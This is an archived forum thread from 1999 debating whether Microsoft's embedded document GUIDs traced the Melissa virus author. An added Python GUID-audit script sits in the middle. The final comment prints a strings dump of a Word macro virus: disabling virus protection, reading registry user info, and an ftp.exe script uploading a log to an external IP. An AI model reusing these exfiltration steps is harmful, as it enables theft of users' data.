Melissa Creator tracked using MS's ID numbers?
So last week there was a lot of hype about Microsoft embedding IDs into documents that would allow tracing of authors. This week there was hype about Melissa- yet another lame doomsday macro virus (intentionally not posted here because I found it stupid). But mix the 2 together, and you get a story sent to us by stevew: the Melissa Virus can supposedly be traced to its creator using those annoying little ids. They don't have exact details, but the article says that it came from AOL.
Sorry - the e-mail address is skyroket@aol.com (without the 'c' in 'rocket').
EH
I'm not trying to invite a flame war, but I like Outlook 'cause I receive *immediate* notification when I get new mail. Sure, I could have Eudora check every 5 minutes, but it's so much nicer to just get the mail without checking for it.
Maybe IMAP is better? I've never used it....
EH
This is not the winblows 98 MSID, this is just a normal GUID generated by the program. What is interesting is that _every_ GUID generated on your machine can be associated to your machine. The GUID gen program uses the MAC address and/or other machine specific numbers to create the number sequence. Does anyone know the scheme for the GUID?
Who says you have to be a semi-literate programmer to use VB?
I think that this is an invasion of privacy in some sense, but nonetheless, for them to be able to track a person down like that is pretty wild.
It seems though that these people are too hard on companies for doing any kind of tracking whatsoever. Who cares if they keep track of who writes what. If you want to remain anonymous, use vi.
it doesn't matter to me.. some script-kiddie going down is a good thing.
in case you didn't realize, search and seizure is also a violation of privacy, but we most often overlook that in the name of the common-good.
What are the advantages of Outlook over Exchange client? This also gives immediate indication of incoming mail. It does not use Word as an editor, so why change to Outlook (as the upgrade to Office 97 wanted to do?)
FIRST, they invade our privacy.
Then, they write documents which can be infected with viruses.
Then, they write a mail server which can conduct the virus.
Then, they sell us this stuff, which can only run on an unstable operating system.
Perhaps, they may find some documents we've written to be "illegal" and find us out with their privacy invading document format.
Which one should we thank them for?
Proud to be (almost) Anonymous
I bet you're right. I had just been thinking the same thing. Oddly enough, in history class (school, shudder) we are learning about WWI, and how the British 'found' a telegram from Germany to Mexico proposing an alliance against America. That was one of the bigger things that got America into the war-- on the side of the British!!!
Creepy, huh?
It seems my login isn't working again, so now I have to actually type "P
LafinJack
"The best defense is a good offense, and I plan to start offending right now." --J. T. Kirk
I'd doubt it, since a MAC address is 48 bits and a GUID is 128...
Oh, ActiveX can be made safe easily. You write a bytecode verifier (x86 assembler is a form of bytecode) and demand that all interfaces (COM, you know?) used be known to it; if not - reject!
mine:~ $ ls -Fl /usr/contrib/bin/less /usr/contrib/bin/less* /usr/bin/more /usr/bin/more*
-r-xr-xr-x 1 bin bin 57608 Jun 15 1998
mine:~ $ which more
/usr/bin/more
mine:~ $ ls -Fl
-r-xr-xr-x 1 bin bin 21876 Jun 12 1998
mine:~ $
Actually less is more than double.
If I wanted to create and distribute a macro virus, and wanted to cover my tracks, the first thing I would think of is to spoof a known macro virus writer..
Anyone with a clue would have embedded someone else's serial number into the virus document.
Wouldn't you have put someone else's serial number in it?
I actually used Word for the first time. Made a test document that contained (without quotes) "!This is a test!"... Then saved it. It should be 16 bytes, or 18 with CRLF. Nope. It's 7,168 bytes. I then looked in the file to see how many times my name appeared in it. *5* freakin' times! The text itself (!this is a test!) appeared 3 times. I always knew M$ was bloated as all hell, but damn! What the hell is the point in storing *MY* name in a document 5 times? Time to deltree c:\msoffice now.
No!! Every GUID CONTAINS the MAC! The last digits.
You need only two Types "Address" and "Non-Address". The other is flavor.
I'm kind of fond of this thing; now when our users ask why we're using Groupwise and WordPerfect, we can just remind them about that big scary virus that was all over the news, which spreads because of Microsoft's incompetence. It's a pretty good way to deflect those comments like, "well, everyone else is using Word, so we should also."
The next step is to see if Groupwise will run under WINE and move everyone to a more robust OS. :)
Anonymous Coward
Now there will probably be a public outcry to KEEP the GUID so we can stop those nasty hackers and pedophiles and pornographers...
I would tend to believe the hacker was not framed, that he just overlooked the GUID. Nobody'll ever make that mistake again. But it doesn't matter, everyone will be screaming for the GUID once more...
I'm inclined to agree. While not condoning "viruses", this type of insidious behaviour is more troubling and potentially chilling in the long run than an acute incident like "Melissa".
If the US Government wasn't so stupid about encryption, both encryption and digital signatures would be much more common than they are now.
If digital signatures were much more common than they were now, maybe software would be smarter about opening stuff that's not signed by people we know.
If software was smarter about opening stuff that's not signed by people we know, maybe we wouldn't have such major issues with macro viruses.
It's the US Government's fault.
Someone could create a similar virus and put the GUID of Bill Gates in.
Seriously, you could take the GUID of a person you don't like and insert it in your self-made virus.
Sounds bad to me.
It amazed me when that genius Berst (www.anchordesk.com) completely overlooked the biggest bennie to Office 2000 in his review of it. Office 2000 DOES have code signing for VBA!
You forgot to mention that various states are attempting to sue gun manufacturers.
KN
Why is this thing being called the "Melissa" virus? Is that the author's name? She must be getting jollied at all the attention her creation is receiving. Kudos to the media for encouraging others to try and get their names on TV/radio/newspapers nationwide. Not.
Charges of terrorism? Against Microsoft? Good idea.
Reality check: People will write viruses. That is a fact of life. They can obfuscate the tracing to make it impossible to find the author. That is a fact of life. Ordinarily the system vendors deal with it and there's no problem. But Microsoft considers proprietary lockins through embedded executable code in documents to be far too important to their revenue stream to even care if they open up the world communication infrastructure to easy destruction.
What Microsoft is doing is criminal negligence.
Microsoft are the ones who are to blame for building an application infrastructure so devoid of even the simplest precautions.
Get to the actual problem. Throw the people in charge of office and outlook development in jail and force Microsoft to issue recalls for all versions of office affected by macro virii.
Have you been visited by Lew Giles??
Maybe M$ has. The NSA has a long history of politely asking companies to make their products less secure than they could be.
Same thing with growing certain plants in your own home even if you are terminally ill and it's for medicinal purposes. But of course, people tend to forget that money is the important thing, not lives or quality of life.
KN
PS: I'd like to take a moment to thank the distilleries, tobacco industry, and pharmaceutical companies for donating so much of their hard-earned money to the war on marijuana while I'm at it.
Hmm, I wonder if Microsoft itself didn't plant the virus in order to show how useful their "tracking" systems are and maybe sway public opinion to accept them, since they can be used for "good". Intel would benefit too, with its processor ID. Anyone buy the conspiracy theory?
Pardon me if this avenue has already been explored in an earlier thread. I haven't read all of them yet!
BTW, I don't REALLY believe this is the case, but it does make for an interesting possibility...
I think the virus writer's GUID ending up in the document is more akin to your phone number ending up on someone else's caller ID box when you make a phone call. You didn't give explicit permission for the phone company to release that information, or permission for the other party to extract it, but it is considered 'acceptable'. I don't think that a company producing software, or any other product, for that matter, needs "just cause" to attach an ID number to the output of that product. "Just cause" is required by law to prevent the abuse of power by our government and its agents. There is no such requirement for private businesses.
It smacks of Big Brother, but a wiretap in violation of the Fourth Amendment it isn't.
It worked on the first release.
What are the chance that MSFT/Intel created the virus to prove that these tracking mechanisms are useful/necessary?
Outlook is the Exchange client. The old exchange client has been replaced by Outlook in the exchange server distribution. MS dropped the old exchange client in Exchange 5.5 Matt Fisher http://securityportal.com
Shortly after the virus was discovered last Friday, the MS Exchange mail servers at Lucent Technologies were brought down to prevent the virus from doing harm, and they're still down now. That's what I call an effective virus.
Can you believe it, we invented Unix and now we're the victim of Microsoft crap.
Hmm... Macro Virus + AOL + alt.sex = some dumb kid.
Ok - I see it - they find out there is this kid writing these viruses - lock him up for five and fine him $350,000!
What would happen to someone if they wrote a M$ macro "virus" that went around cleaning up malicious viruses from documents? Would that person (should that person) have the same judgement placed against him/her?
M$ makes crap - that much is true. Whoever wrote this (most likely some kid) was stupid for letting the GUID persist (unless he was smart and was framing someone). But the judgement doesn't fit the crime!
What about the stupidity of people not backing up their data on a regular basis?! Or that of computer manufacturers not including a backup device on their systems (that damn floppy drive doesn't cut it!)?
I can't believe the number of times I have heard of someone's system dying and asking them if they had a backup - only to hear a reply similar to "Uhh, what's that...?"...!
I read somewhere that Melissa's source code would be available on the Internet. I'm intending to study the source for non-evil purposes (yeah, I'm serious!).
Anyone got an URL?
//Jonas
We start bombing an East European nation and within days email servers are failing.
Is anyone surprised that the company who fakes trying to create Grassroots support wouldn't stoop so low as to hype a lame macro virus and then amazingly the author is uncovered and the world saved using a highly controversial identifier?
Stay tuned next week when Michelangelo III pops up and the author is tracked using the serial number on his PIII.
This is MS PR at its worst, and the world fell for it. Long Live LINUX and OPEN SOURCE!
I for one am happy for the GUID. If nothing was in place, viruses could eventually run even more wild. A sort of watch dog that you could get caught. Like a deterrent similar to that of the electric chairs and murder.
Shockingly a lot of computer users are screaming "Where's my privacy", "Big Brother is watching." Well stop your whining. These appear to be cries from guilty parties of something. We innocent people could care less about your privacy and what you do with it. You're not as important to us as you might think.
You're messing with our lives and livelihoods and then have the nerve to cry foul when someone tries to fight back. What a pathetic loser.
I was referring to Word, not WordPerfect. I use WP when I can, which is always.
Executable documents are just plain wrong.
Not in an operating system with fine grained security permissions. Unfortunately all popular OS's lack finely-grained enough security permissions so that you can run a downloaded application safely (except through running a Java applet).
Heaven knows no Unix programmer would ever write something that replicates itself via email. ;-)
"This week there was hype about Melissa- yet another lame doomsday macro virus (intentionally not posted here because I found it stupid)."
Well that's just great, I wonder what other NEWS I didn't end up hearing about because Rob Malda "found it stupid." That's a wonderful idea actually, wouldn't it be great if all of the media worked this way? "What's that you say? Some kiddy-bopper in Finland wrote some program that you think is going to destroy Microsoft? That's Stupid! I can't print that..."
Sarcasm aside, I think that it's a damn shame that Slashdot is more centered around the life and views of Rob than objective news.
"So it's agreed, then. Steve, set up the Skyroket account. Nathan, I like your idea of using MAPI instead of making the virus specifically target Outlook, but then it'd make any mail vendor look bad, not just us. Me, I'll go convince the Office 2000 team to turn macros on again by default."
Gosh, I couldn't be more convinced....
The poster was thinking of IBM's "RFT" format, used on AS/400 boxes and who knows what else. "RFT" stands for "revisable-form text".
think about it: would a kid who writes viruses have his own copy of word? no. he probably has some pirated copy that 10,000 other people use. that's gonna really narrow it down.
Right on, plus MAC addresses can be changed (i tried to post this earlier and it hasn't appeared)
Certain ethernet cards allow flashed ROMs to change the number. See the latest 2600 quarterly article on hacking cable modems for reference.
I never thought I'd see an argument for security through obscurity on /., but I guess the world is full of wonder.
The GUID is not the sw registration number. It is the MAC address of the NIC. Pay attention. And multiple viruses have now been tracked to one AOL account.
Moron
No kidding--one job I did was for an office where people blithely clicked "OK" without ever reading what was in the dialog ("Do you want to delete all records? OK!").
It's my belief that this is one of Microsoft's dumbest actions. Instead of putting real text in the buttons (like, "SAVE", "DELETE", etc.), you just get the autoresponse of "OK". Other operating systems use this, but I guess Microsoft couldn't be bothered with it.
But, even if this is the case, I really wish there was something that could be done against M$ for introducing the entire concept of Word viruses to the world; if they had introduced the security needed into the vis basic routines when they first put out Word 6, things wouldn't be as rampant now. I
Can you say class action lawsuit? MS certainly deserves it for selling such a product with such bone-headed security.
All the GUID does is help catch the criminal who created the virus (assuming the GUID is accurate and was not forged).
Criminal? I hardly think this guy released a criminal virus. I get more spam probably. I mean really, all he did was put in well written code that sends more mail out to other people. There's practically more space spent on the silly time=date code and remarks than on the actual "virus". What law does this break? It can't be worse than spam.
If anything, slap a medal on this guy for pointing out to the world how _stupid_ Microsoft is for making high end features on low end products for low end users that anybody with half a brain can exploit for "evil."
Microsoft should be glad this virus didn't do anything else.
Also, vote me in for the GUID conspiracy. I thought the same thing when I saw the first link to the tracking.
http://msdn.microsoft.com/isapi/msdnlib.idc?the
Billy boy would have several, one for every NIC
--Mephie
Let's see:
o MS takes all kinds of heat from folks who give a whit about privacy because, without asking, they implant a serial number in every document their "software" generates.
o A week or two later, a virus (or worm or -insert favorite label-) exploits a vulnerability in MS applications and infects other MS products.
o Within days, miraculously, an MS serial number is found in the virus and is used to track down the author!
Wow! How fortuitous! Microsoft, not content to invent the internet (well, *co*-invent with AG), has now saved business millions of dollars by catching this evil hacker! Thanks, Bill!
Not.
Peter
Can you blame them for making a statement like that though. Reading through these comments, I'm finding a lot of "Death to Microsoft and those that use their os/apps" mentality here. This is one thing that continues to bother me with the Linux community. It's a nice OS but it's not for everyone.
I think it's a damn shame that some people feel all "news" should be simultaneously reported everywhere. There probably won't be an article about the Melissa "virus" in this month's issue of "Cat Fancier" either. Why should we all have to dwell on Microsoft-created problems like Melissa? (Microsoft created because of the assumption they made that every copy of Word and Excel should by default be enabled to send email through the macro language).
There's been no Melissa problem at my place of work (a Multinational, not a mom-and-pop) because we don't use Exchange, Outlook, or Office 97.
Maybe a few IS people should be fired for buying Microsoft over this.
because I was one of those who sent in the Melissa virus report to Slashdot. I just thought it was important as MANY Slashdotters do use Windows, Word, Outlook, blah in their workplace because their bosses say so (although personally we all prefer Linux/FreeBSD/etc :)
At least CERT thought it was important. I think this is the second time they issued a worldwide warning in their 10 years of existence (this is something I read somewhere else, CNN I think).
Oh well... just me bitching, ranting and raving!
Bad conspiracy theories make it less likely people will believe the real truth. If they find the author of Melissa, and he's some 15-year-old script kiddie, accusations that Microsoft was behind it will look ridiculous, and taint anything else these people say. The tale of the boy who cried wolf is well worth heeding.
If there's anything I intend to take personally, it's the fact that wild conspiracy theories are FUD, and I'd like to think that /.ers would be better than merely sinking to the level of their most dishonest foes. It hurts all of us.
>First of all, some of the mailservers were put out of operation, and some sites had to disconnect mail service. That's harm.
...
Hmm, Exchange Server has been known to put itself out of operation (and other servers too) without regular reboots (an out-of-service condition all its own).
>Second, the change in machine state causing an undesirable activity is vandalism. Painting the next Mona Lisa on the side of a building would be vandalism, even if the owner was then able to sell the wall for $1M
The Exchange client software is buggy, changes the machine state and causes undesirable activity (e.g. registration sends GUID to Microsoft), undesired winmail.dats etc.
>Third, while it may impose no additional cost to the victim, sending mail from his machine was an act with economic value; the improper use is theft and/or trespass.
Once again, exchange generates a *lot* of network activity that is not explicitly initiated by the user - sounds like theft of bandwidth and trespass.
>Fourth, the message sent would be likely to cause problems between the sender & recipient.
I don't know what these exact problems are, but the GUID (and other juicy info) sent to Microsoft likewise causes "problems" for the sender. The recipient is probably happy to receive free marketing information that the sender didn't wish to transmit.
>I see no way in which the virus *isn't* harmful.
I must admit that there are probably ways in which Exchange is non-harmful, I just can't think of any right now. Undesired attachments? mail protocol violations?
Sounds like a good case.
Ever look at an RTF file in a text editor? It's just a frigging markup language. They can't hide anything in it.
Here's a quarter, buy a clue.
IH8ZENOR
Yes, but the GUID goes a long way towards proving this in court. Especially if they can find the Ethernet card with the MAC address corresponding to the GUID. Of course, if I were this guy, I'd be getting rid of some hardware right now...
Except of course in cases involving any allegation of drug use, impropriety, or action alleged to be against the state. In such cases ordinary legal protections are not really in force in American courts. The United States is quite terroristic in these matters.
But in the remaining kinds of cases you are quite correct, illegal search and seizure are deemed objectionable.
It cannot
The files do not keep a copy of all the transit points, they only keep the last creator, not all levels of creators, it's not like it has the original and the second etc.
You would only get the last creator, never the orig, and besides the source is probably from a university machine using a pirate copy.
Get a clue! Man perhaps we do need a nuke to get rid of clueless twits
Has the computer world really been vitiated to such a degree that a 13-14 year old "coder" can write a Word macro and attract national attention?
Let me remind you all that this is a Word macro. Even the techniques being used to capture this kid are unbelievably obvious. If the "hacker" were all that competent and/or actually intended to attract this much publicity, it would make sense for him to license the product using a generic fake ID and release the "virus" from an internet cafe or campus using a generic login. It appears that this script kiddie did none of those things. I think it's sad that he's turned this many heads. I almost feel bad that the FBI is going to make an example out of some poor wanna-be coder. I'll give two to one odds that the author turns out to be under twenty years old. Oh well.
Ryan Taylor
(ryan@schulzemfg.com)
---
Win95 is a virus.
Check out the following link:
http://itrain.org/itinfo/1999/it990307.html
There are four articles in this series. The last one details Microsoft's promise to patch Win98 and to supply a tool that removes the GUID from Word97 documents. There's a link to the MS web site in one of the articles in the series... or there was. Now the web page in the link is gone.
And the latest word is that the alleged perp who unleashed the virus may be a patsy -- he has said he doesn't have a clue about all of this and had nothing to do with the virus. Also, he supposedly had some Word docs available at his web site that would have made it easy for someone to crack his GUID out of the docs and use the id in the virus.
Now maybe Microsoft didn't do it... but the outcome is that Microsoft doesn't have to protect the privacy of their customers now.
"See? We told you the GUID was a good idea."
Next step: Convince everyone that the Pentium III chip id is a good thing, too.
Think Uncle Sam might have a vested interest in seeing everyone id'ed online, too?
Color me suspicious...
Me again, the same anonymous coward who posted the original article in this "scam" subthread...
Have some more links...
http://security.pharlap.com/regwiz/index.htm
This site demonstrates the insecurity that Microsoft wants all of us to swallow.
http://www.vecdev.com/guideon.html
This site provides a free utility to remove or munge the GUID.
What concerns me is that with so many white papers and other docs written in MS Word, posted to the Web, any number of innocent people can be framed for creating an MS Word virus.
EVERYONE should cleanse their MS Word docs before transferring them by ftp, by e-mail, etc.
--the suspicious guy
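Two threads above ask what the GUID scheme actually is (the question about whether the MAC is in there, and the doubt that a 48-bit MAC fits in a 128-bit GUID) and this post advises checking documents for an embedded GUID before sending them out. The script below is an added example, not code from any poster or from the GUIDeon tool linked above. It uses the layout of a version-1 GUID as RFC 4122 later standardised it (time fields, variant/clock sequence, then a 48-bit node field in the last 12 hex digits, which is the adapter MAC when one was available and a random value with the multicast bit set when it was not), so a 48-bit MAC fits with 80 bits to spare. The sample version-1 value is the DNS namespace UUID published in RFC 4122; the version-4 value and the byte blob standing in for a document are constructed here, and the assumption that a document would carry the GUID as plain ASCII or UTF-16LE text is an assumption of this example, not something the page states.

```python
import re
import uuid

# Real version-1 UUID published in RFC 4122 (the DNS namespace); its node field
# is 00:c0:4f:d4:30:c8. The version-4 value below is constructed for this example.
SAMPLE_V1 = "6ba7b810-9dad-11d1-80b4-00c04fd430c8"
SAMPLE_V4 = "f47ac10b-58cc-4372-a567-0e02b2c3d479"


def describe_guid(text):
    """Classify a GUID string and, for version 1, pull out the node (MAC) field.

    Only RFC 4122 version-1 GUIDs carry a node field. If its first octet has the
    multicast bit (0x01) set, RFC 4122 4.5 says the node was randomly generated
    and cannot be tied to a network adapter, so attribution from it is worthless.
    """
    u = uuid.UUID(text)  # accepts {braces}, hyphens and either letter case
    info = {"version": u.version, "variant": u.variant,
            "node": None, "node_kind": "none (no MAC in this GUID type)"}
    if u.variant == uuid.RFC_4122 and u.version == 1:
        node = u.node  # low 48 bits of the GUID == last 12 hex digits
        octets = [(node >> (8 * i)) & 0xFF for i in range(5, -1, -1)]
        info["node"] = ":".join(f"{b:02x}" for b in octets)
        first = octets[0]
        if first & 0x01:
            info["node_kind"] = "random (multicast bit set, RFC 4122 4.5)"
        elif first & 0x02:
            info["node_kind"] = "locally administered address (operator-chosen)"
        else:
            info["node_kind"] = "globally unique MAC (IEEE-assigned OUI)"
    return info


# GUID-shaped text: 8-4-4-4-12 hex digits, optional braces.
GUID_TEXT = (r"\{?[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}"
             r"-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}\}?")
GUID_RE_ASCII = re.compile(GUID_TEXT.encode("ascii"))
GUID_RE_TEXT = re.compile(GUID_TEXT)


def find_guid_strings(blob):
    """Return every GUID-shaped string stored in blob as ASCII or UTF-16LE text.

    Assumption of this example: the identifier is stored as text in one of
    those two encodings. A binary (16-byte) GUID would need a different scan.
    """
    hits = [m.group(0).decode("ascii") for m in GUID_RE_ASCII.finditer(blob)]
    for offset in (0, 1):  # UTF-16LE text may start on either byte alignment
        wide = blob[offset:].decode("utf-16-le", errors="ignore")
        hits.extend(m.group(0) for m in GUID_RE_TEXT.finditer(wide))
    return hits


def audit_blob(blob):
    """Pre-send check: list each embedded GUID with its version and node analysis."""
    report = []
    for g in find_guid_strings(blob):
        try:
            report.append((g, describe_guid(g)))
        except ValueError:
            continue  # looked GUID-shaped but did not parse; ignore
    return report


def build_sample_blob():
    """Constructed stand-in for a document: filler bytes plus two embedded GUIDs,
    one as braced ASCII text and one as UTF-16LE text."""
    return (b"\x00" * 16
            + b"Normal document text. "
            + b"{" + SAMPLE_V1.encode("ascii") + b"}"
            + b"\x00" * 8
            + SAMPLE_V4.encode("utf-16-le")
            + b"\x00" * 4)


if __name__ == "__main__":
    for guid, info in audit_blob(build_sample_blob()):
        print(guid, info)
```

Run as-is, it reports the version-1 GUID with node 00:c0:4f:d4:30:c8 flagged as an IEEE-assigned MAC and the version-4 GUID with no node at all, which is the practical point for the thread: a GUID only points at hardware when it is version 1 and the node's multicast bit is clear, and even then the value is copyable text, so on its own it is weak evidence of who created a document.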
Well, I'm convinced, this is the last straw (this GUID b.s.). Time to dump MS products from my systems.
I've said it for several years now... I use MS because I have to (for consulting, etc.); I use Linux because I choose to. I'm recommending to all my clients that they dump MS and switch to Linux if at all possible.
For those old Office docs, though, there's an alternative. Cleanse the GUID from them, then edit or create new docs on Linux with Star Office.
Feh. Fooie, Microsoft!
You're not being overly paranoid. MS has given us plenty of reasons to distrust it. Bill Gates, burn in hell.
If the DoJ lets MS off easy -- and the GUID is kept around to track those "bad hackers" -- I'll be concerned that MS cut a deal to supply the feds with GUID tracking info as needed.
Dear Mr. Fascist.
The punishment should fit the crime. It's like when the FBI, BATF and special forces barbecued those people in Waco Texas, did they scare other cult members or gun owners straight?
No, all they did was piss people off. All they did was incite the murder of 168 people two years later.
The more they tighten their grip, the more people on the fringes will slip through their fingers. (Credit to George Lucas)
Lord Kano (Too lazy to Log in)
hmm...maybe we should also give J-Walkers LIFE. Speeders should get DEATH. Then we should go after all those 12year old 31337 scr1pt K1dz who made the 123213144 virii for Windoze/DOS/MacOS. They should get LIFE in jail and DEATH.
:)
If you ask me the FBI should be going after M$. All the virii and this 1 of 1000 Micro Viruses is all MS's fault. Funny how a MS-DOS Virus from 1984 can still mess up Windoze98. If they really spent the money on making good software rather than making good FUD we wouldn't be having these problems. Do we see this crap on any of the Unix's or Linux? no..Do we see this crap on Apple OS's? Not nearly as much.
So now the FBI is gonna track down and lock up some guy with too much time on his hands just to save MS some bucks. I'll bet he is a better programmer than most of the people who code for MS.
PS: I hope you get pulled over for Speeding
I'd call it a worm. It doesn't actually destroy stuff, it just propagates...
Obviously, it would be trivial to add code to severely damage the software the macro is run on - kill "*.*" would be a start. With the rate this thing propagated, the destruction could have been massive.
I guess this is why the MS EULA has so much fine print!
Perhaps YOU overlook the violation of your personal freedom, civil liberties, and the Constitution when it becomes convenient in order to bother someone else, but most of us would rather let a criminal walk free than sentence an innocent man to prison. If we give these bastards an inch of our freedom, they take it all. If you doubt that, read the Constitution and compare its limitations on the power of our government with our current situation. YOU tell US whether our government can be trusted if we let them take away freedom and law in order to "catch the bad guy".
:-|
Hell, we're all still spending an extra 2 hours at the airport each trip to protect us from terrorists when it is pretty damn likely that airline crash that caused all of this dismissal of our civil liberties was in reality shot down by our own navy. Yippee.
Yup.. i agree... look AOL may be getting a bit cooler, getting netscape .. but geesh, get control of your on-line service first. You have a bunch of internet freaks that don't know anything except how to annoy people. Good thing i don't use M$ at home.
Dark_Hour
...it's the MAC number on the nic which will bite them in the ass So surely then, if the creator were to have a machine without a NIC then the GUID would be meaningless?
Nope. You also need to distinguish the object type that the address points to. Or else, how would you know, if you have a thingie of type address, whether it points to another address, or to a non-address?
ViewVBCode
c:\class.sys
VBA332.DLL
VicodinES Loves You / Class.Poppy
I Think
is a big stupid jerk!
codemodule
I have no idea what's going on but happened to open a word doc in recover text mode. being curious I scanned down to see what garbage was in the file and came across the above not more than 1 min later i noticed the article and then VicodinES pops up. I have no idea what the connection is or why it's embedded in some of our word documents.
From what I understand the difference between a worm and a virus is that, a virus infects a program, and a worm is a self contained program. Wouldn't a script constitute a self contained program?
Well, I really don't know how Melissa works, from the blurbs I've heard on the news, you get an email talking about an important document, you download the document and open it, when you open it, it runs the script and the script sends 5 emails with the same document to 5 email addresses on your system.
Now if it infects other documents and sends those documents then it is a virus, but I don't know for sure.
MSNBC has an article on the supposed "source" of the virus, and towards the bottom is a picture of the "original posting" to alt.sex. You can make out the e-mail address of SkyRocket believed to be the originator. Boy, I'd hate to have to check his e-mail tonight! ;-)
EH
HTML doesn't have viruses and no one cares who first wrote it.
Whenever I try to put Unix in at our company there is always a fuss thrown by middle-managers; but when something like this happens, they shrug?
Let's face it: Microsoft products are glitzy but they are not secure, not robust, and often not correct. It's time to back public protocols for business solutions and to be responsible by supporting correct and reliable standards and programs.
What if Microsoft was behind the whole thing? This way, they can justify the use of the GUID's.
:)
It was just too easy to catch up to the culprit. I don't think any self-respecting cracker would leave such obvious fingerprints.
Think about this too: This was a clever virus that used Outlook and Office to spread itself. Why didn't anyone do this before? Because only Microsoft programmers would think of such a thing!
BTW... If anyone takes this post too seriously, then they need to take more humor lessons.
...as Bill Clinton might say.
Hmm... I think it is documented somewhere. At least it is ascii.
I use Applixware and have found that RTF is the best way to exchange documents with the 'dark side' of the company. Things sorta go both ways without too much degradation. Even pictures.
I'm trying to get them to send RTF when they mail documents to other people so we don't get those embarrassing "your document has a virus" emails.
-- cary
Our civilization should have learned the hard way that diversity is good, and having a critical infrastructure based on identical systems is bad. The Irish potato blight comes to mind, as do health problems in race horses and Mr Morris's worm.
Without diversity the whole infrastructure is 'brittle' wrt new threats. With diversity there is strength. That in itself should be reason enough to prevent one entity's domination of the information technology infrastructure, be that cisco, microsoft, intel, or even (gasp!) Linux.
This is one of my pet peeves, and everyone needs a pet.
-- cary
/* anyone
smart enough to engineer this type of thing would
be smart enough to be able to cover their tracks.. */
Nonsense. It's just a macro virus, not a balanced AVL tree. It doesn't take a genius to write a macro virus.
I dunno. Maybe I'm paranoid. But I was thinking, "Yanno, If I were MS and I were catching flak for this whole privacy thing, I'd consider something like this."
Their record shows they're not above dishonesty if they think it will advance their public image. They've never done anything quite so destructive in the past if you don't count inflicting Windows on us all, but I'm afraid I find the scenario plausible. I really believe that they would do this if they thought they could get away with it.
Trust no one.
/*
Doesn't it scare people here what can happen to you for programming something on a computer? */
No more than the conviction of Ted Kaczynski scared me about what could happen to me for making something in my kitchen. And like Kaczynski, it's a lot more scary knowing that malicious bastards are out there.
Virus writers and crackers need to be given some serious jail time and fines. They cost the economy a great deal of money. They've been able to get away with this crap for way too long. I hope they catch the little SOB and throw the book at him.
If you think about this, using the ID to track the writer is probably legal. After all, it's legal to use your fingerprints to convict you of a crime. IMHO this is no different. User happened to leave his dirty little fingerprints in a couple of places on the net. Open and shut book there.
HOWEVER, this is also hardly more than circumstantial evidence. I bet it would be trivial to write a perl program to go out to j.random.word.document on the web, extract the GUID, and overwrite the GUID of a word document that you've created. If I were out to get someone (Like a competing cracker, for instance) that's exactly what I would do. The Melissa virus came out well after the news of the ID had been posted.
If I used Microsoft products, I'd prove this by writing a program to do just that. Might have to borrow a 'doze box long enough to get a few word documents to play with. That's assuming a "Swap your GUID" script isn't already on rootshell for the script kiddies' downloading pleasure.
I'm sure that the law enforcement community can find some law that the Melissa author violated.
But Microsoft has written code that (1) its purpose (and effects) are not disclosed (2) is purposely malicious to users (collecting GUID's, embedding irrelevant private hidden information in documents (I'm referring here to directory trees, other file contents etc.) (3) is widely disseminated without user knowledge (except for the "trojan" part e.g. wordprocessor, browser, etc.) (4) generates network packets that the user does not know about or initiate directly.
Microsoft's motivation for these actions was profits and power. The virus writer's motivation was? Microsoft has inflicted serious costs onto individuals, businesses, etc because of such software "hidden features." So even if intent is part of the statute, Microsoft had intent. It is harder to imprison a corporation than an individual, but fines etc. are easy to impose.
;-)
There are people whose lives (not livelihood) depend on their anonymity. Suppose your document regarding government officials is intercepted on its way to Amnesty International. This whole episode should give those government officials a pretty good idea how to track the culprits down if the document was written in Word. Thank god for ASCII and PGP!
KN
Life in prison? Death? For a freaking computer virus? Yes, I agree they cause lots of problems, but I don't think you should kill the dude!
What would you get for a speeding ticket? Your right foot chopped off?
(hey, this is beginning to sound like those middle eastern countries!)
Kevin Mitnick accepted a plea bargain... and denied the Feds a show trial. He certainly wasn't going to get a fair trial, not after being held in jail for *four years* and denied reasonable access to the evidence in order to prepare a defense.
Less than a week later Melissa is introduced... and now we learn of "proof" that the author was a known virus writer. The "proof" is that the MS GUID in the virus matches that readily available in documents posted on his web site.
In other words, the "proof" is precisely as valid
as my "proof" that I wrote Linux in 1972. After all, who can argue with the timestamp on the files?!
Do I really believe this is a deliberate attempt to frame someone for political purposes? No. Do I believe that Kevin Mitnick is totally innocent and should have never spent a day in prison? No.
But I *do* believe in history's lesson that the way we treat the Kevin Mitnicks and Larry Flynts of the world today is how *we* will be treated tomorrow. I find it deeply disturbing that Kevin Mitnick, accused of *no* violence, was held prior to trial far longer than either Timothy McVeigh or Ted Ka^H^H^H^H the unabomber. It is significant that the latter two individuals faced the death penalty, while Mitnick will now be out within a year. Where is the justice in a system where an individual, even if acquitted, will spend the same amount of time in prison?!
I further believe that nothing is more dangerous to freedom than a grandstanding prosecutor. The Communist witch hunts in the 50's are a classic example, and already I can hear the questions:
Are you now, or have you ever been, a hacker?
Do you now, or have you ever, associated with known hackers?
The very real differences between "hackers" and "crackers" will matter no more than the differences between active Soviet sympathisers and the "fools" who didn't believe that 1950's America was the peak of human civilization and culture.
The bottom line, today, is that any defense lawyer who uses this as a defense is an idiot. I would not convict on this evidence alone, but neither do I find it particularly likely that it is, in fact, a setup.
The bottom line, tomorrow, is that the feds need to be careful with how they handle crackers because reasonable people *are* starting to ask questions about the way such cases are treated. The worst a cracker could do is a drop in the bucket compared to the damage caused by distrust of prosecutors. (Prime examples: AG Meese's comment that "there are, by definition, no innocent suspects" or Kenneth Starr's effect on the debate over renewing the independent counsel law.)
I got a Word document emailed to me the other day -- since I was on a unix box at the time, I used 'strings' to have a quick look at it. Here is part of what I found (just the juicy bits):
/c ftp.exe -n -s:c:\netldx.vxd
(Note: I'm pretty clueless as to the internal workings of Word documents, but it looks like the virus writer was kind enough to comment his/her code!)
- this is a marker!
Declare Variables
Initialize Variables
Switch the VirusProtection OFF
HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info
LogFile
' Log
file -->
' Log
file -->
C:\hsf
.sys
c:\netldx.vxd
o 209.201.88.110
user anonymous
pass itsme@
cd incoming
ascii
put
quit
command.com
HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info
LogFile
Make sure that some conditions are true before we continue infecting anything
Tru
Infect the NormalTemplate
ed = T
alTe
veDocu
Write a log file of this NormalTemplate infection
hh:mm:ss AMPM - $
dddd, d mmm yyyy$
ode
ime, "
Infect the ActiveDocument
empl
tiveDo
